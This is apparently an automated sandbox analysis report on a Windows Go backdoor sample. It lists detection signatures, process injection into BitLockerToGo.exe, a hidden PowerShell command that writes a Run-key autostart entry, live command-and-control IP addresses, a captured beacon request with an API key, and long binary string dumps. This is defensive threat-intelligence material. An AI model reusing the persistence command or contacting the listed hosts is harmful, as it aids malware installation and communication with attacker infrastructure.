

Windows Analysis Report
BwqqVoHR71.exe

Overview

General Information

Sample name: BwqqVoHR71.exe
renamed because original name is a hash value
Original sample name: 0a21a94198f6157abb36bf55cb43be27.exe
Analysis ID: 1537033
MD5: 0a21a94198f6157abb36bf55cb43be27
SHA1: 9a01b5e8a68be2b49250c730f8c3ecaee3734170
SHA256: 53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
Tags: exe user-abuse_ch

Detection

GO Backdoor
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found Tor onion address
Injects a PE file into a foreign processes
Suspicious powershell command line found
Writes to foreign memory regions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • BwqqVoHR71.exe (PID: 8164 cmdline: "C:\Users\user\Desktop\BwqqVoHR71.exe" MD5: 0A21A94198F6157ABB36BF55CB43BE27)
    • BitLockerToGo.exe (PID: 7660 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 5908 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • BitLockerToGo.exe (PID: 3192 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security | 
Process Memory Space: BitLockerToGo.exe PID: 7660 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security | 

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 7660, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", ProcessId: 5908, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T14:10:38.691903+0200 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.10 | 49988 | 109.172.88.38 | 23961 | TCP
2024-10-18T14:11:07.929703+0200 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.10 | 49988 | 109.172.88.38 | 23961 | TCP
2024-10-18T14:11:08.196218+0200 | 2855538 | 1 | A Network Trojan was detected | 109.172.88.38 | 23961 | 192.168.2.10 | 49988 | TCP
2024-10-18T14:10:38.691574+0200 | 2855539 | 1 | A Network Trojan was detected | 109.172.88.38 | 23961 | 192.168.2.10 | 49988 | TCP


      AV Detection

      Source: BwqqVoHR71.exe | ReversingLabs: Detection: 28%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
      Source: BwqqVoHR71.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: BwqqVoHR71.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp

      Networking

      Source: Network traffic | Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.88.38:23961 -> 192.168.2.10:49988
      Source: Network traffic | Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.10:49988 -> 109.172.88.38:23961
      Source: Network traffic | Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.10:49988 -> 109.172.88.38:23961
      Source: Network traffic | Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.88.38:23961 -> 192.168.2.10:49988
      Source: global traffic | TCP traffic: 109.172.88.38 ports 23961,1,2,3,6,9
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000003B34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004323000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000003508000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004906000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BitLockerToGo.exe, 00000002.00000002.3157476707.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: global traffic | TCP traffic: 192.168.2.10:49988 -> 109.172.88.38:23961
      Source: Joe Sandbox View | IP Address: 46.8.232.106
      Source: Joe Sandbox View | IP Address: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106 (11 occurrences)
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61 (11 occurrences)
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253 (12 occurrences)
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91 (9 occurrences)
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243 (5 occurrences)
      Source: unknown | TCP traffic detected without corresponding DNS query: 109.172.88.38 (2 occurrences)
      Source: unknown | HTTP traffic detected:
      POST / HTTP/1.1
      Host: 46.8.232.106
      User-Agent: Go-http-client/1.1
      Content-Length: 162
      X-Api-Key: oFbfsa5f
      Accept-Encoding: gzip
      Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
      Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://188.130.206.243
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://188.130.206.243http://46.8.232.106
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.232.106
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.236.61
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://93.185.159.253
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
